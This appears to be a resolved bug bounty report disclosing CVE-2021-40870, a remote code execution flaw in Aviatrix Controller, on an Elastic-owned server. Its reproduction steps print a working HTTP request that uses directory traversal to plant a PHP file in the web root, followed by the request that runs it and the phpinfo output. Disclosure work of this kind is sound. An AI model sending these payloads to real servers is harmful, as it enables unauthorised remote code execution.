CVE-2021-40870 on [52.204.160.31]
Critical
E
Elastic
Submitted None
Actions:
Reported by
fdeleite
Vulnerability Details
Technical details and impact analysis
An issue was discovered in Aviatrix Controller 6.x before 6.5-1804.1922. Unrestricted upload of a file with a dangerous type is possible, which allows an unauthenticated user to execute arbitrary code via directory traversal.
The IP has a SSL certificate pointing to ElasticSearch.
``curl -kv https://52.204.160.31``
Output
```
Server certificate:
* subject: C=US; ST=California; L=Mountain View; O=Elasticsearch, Inc.; CN=*.elasticit.co
```
## Steps To Reproduce
First, run this request:
```
POST /v1/backend1 HTTP/1.1
Host: 52.204.160.31
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Connection: close
Content-Length: 136
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
CID=x&action=set_metric_gw_selections&account_name=/../../../var/www/php/1yv4QQmkj4h4OdmmyT11tkiGf5M.php&data=RCE<?php phpinfo()?>
```
The retrieve the content from file ``1yv4QQmkj4h4OdmmyT11tkiGf5M.php``
```
GET /v1/1yv4QQmkj4h4OdmmyT11tkiGf5M.php HTTP/1.1
Host: 52.204.160.31
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
```
Which is basically the output of the phpinfo function:
Response (truncated):
```
tr class="h"><th>Variable</th><th>Value</th></tr>
<tr><td class="e">SCRIPT_URL </td><td class="v">/v1/1yv4QQmkj4h4OdmmyT11tkiGf5M.php </td></tr>
<tr><td class="e">SCRIPT_URI </td><td class="v">https://52.204.160.31:8443/v1/1yv4QQmkj4h4OdmmyT11tkiGf5M.php </td></tr>
<tr><td class="e">HTTPS </td><td class="v">on </td></tr>
<tr><td class="e">SSL_SERVER_S_DN_C </td><td class="v">US </td></tr>
<tr><td class="e">SSL_SERVER_S_DN_ST </td><td class="v">California </td></tr>
<tr><td class="e">SSL_SERVER_S_DN_L </td><td class="v">Mountain View </td></tr>
<tr><td class="e">SSL_SERVER_S_DN_O </td><td class="v">Elasticsearch, Inc. </td></tr>
<tr><td class="e">SSL_SERVER_S_DN_CN </td><td class="v">*.elasticit.co </td></tr>
<tr><td class="e">SSL_SERVER_I_DN_C </td><td class="v">US </td></tr>
<tr><td class="e">SSL_SERVER_I_DN_O </td><td class="v">DigiCert Inc </td></tr>
<tr><td class="e">SSL_SERVER_I_DN_CN </td><td class="v">DigiCert SHA2 Secure Server CA </td></tr>
<tr><td class="e">SSL_SERVER_SAN_DNS_0 </td><td class="v">*.elasticit.co </td></tr>
<tr><td class="e">SSL_SERVER_SAN_DNS_1 </td><td class="v">elasticit.co </td></tr>
<tr><td class="e">SSL_VERSION_INTERFACE </td><td class="v">mod_ssl/2.4.39 </td></tr>
<tr><td class="e">SSL_VERSION_LIBRARY </td><td class="v">OpenSSL/1.1.1b </td></tr>
<tr><td class="e">SSL_PROTOCOL </td><td class="v">TLSv1.2 </td></tr>
<tr><td class="e">SSL_SECURE_RENEG </td><td class="v">true </td></tr>
<tr><td class="e">SSL_COMPRESS_METHOD </td><td class="v">NULL </td></tr>
<tr><td class="e">SSL_CIPHER </td><td class="v">ECDHE-RSA-AES128-GCM-SHA256 </td></tr>
<tr><td class="e">SSL_CIPHER_EXPORT </td><td class="v">false </td></tr>
<tr><td class="e">SSL_CIPHER_USEKEYSIZE </td><td class="v">128 </td></tr>
<tr><td class="e">SSL_CIPHER_ALGKEYSIZE </td><td class="v">128 </td></tr>
<tr><td class="e">SSL_CLIENT_VERIFY </td><td class="v">NONE </td></tr>
<tr><td class="e">SSL_SERVER_M_VERSION </td><td class="v">3 </td></tr>
<tr><td class="e">SSL_SERVER_M_SERIAL </td><td class="v">093CE89EF93EE5F18D1E07099ACC5AF9 </td></tr>
<tr><td class="e">SSL_SERVER_V_START </td><td class="v">Mar 20 00:00:00 2020 GMT </td></tr>
<tr><td class="e">SSL_SERVER_V_END </td><td class="v">Mar 25 12:00:00 2022 GMT </td></tr>
<tr><td class="e">SSL_SERVER_S_DN </td><td class="v">CN=*.elasticit.co,O=Elasticsearch\, Inc.,L=Mountain View,ST=California,C=US </td></tr>
<tr><td class="e">SSL_SERVER_I_DN </td><td class="v">CN=DigiCert SHA2 Secure Server CA,O=DigiCert Inc,C=US </td></tr>
<tr><td class="e">SSL_SERVER_A_KEY </td><td class="v">rsaEncryption </td></tr>
<tr><td class="e">SSL_SERVER_A_SIG </td><td class="v">sha256WithRSAEncryption </td></tr>
<tr><td class="e">SSL_SESSION_ID </td><td class="v">9cf6b4b42df9e371982120b49d57f9112c19df3722fb87d15cc592f73e1fa406 </td></tr>
<tr><td class="e">SSL_SESSION_RESUMED </td><td class="v">Initial </td></tr>
<tr><td class="e">HTTP_HOST </td><td class="v">52.204.160.31 </td></tr>
<tr><td class="e">HTTP_USER_AGENT </td><td class="v">Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36 </td></tr>
<tr><td class="e">HTTP_CONNECTION </td><td class="v">close </td></tr>
```
## Impact
- An unauthenticated, 3rd-party attacker or adversary can execute remote code
### Supporting Material/References
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40870
Related CVEs
Associated Common Vulnerabilities and Exposures
CVE-2021-40870
UNKNOWN
An issue was discovered in Aviatrix Controller 6.x before 6.5-1804.1922. Unrestricted upload of a file with a dangerous type is possible, which allows an unauthenticated user to execute arbitrary code via directory traversal.
Report Details
Additional information and metadata
State
Closed
Substate
Resolved
Submitted
Weakness
Code Injection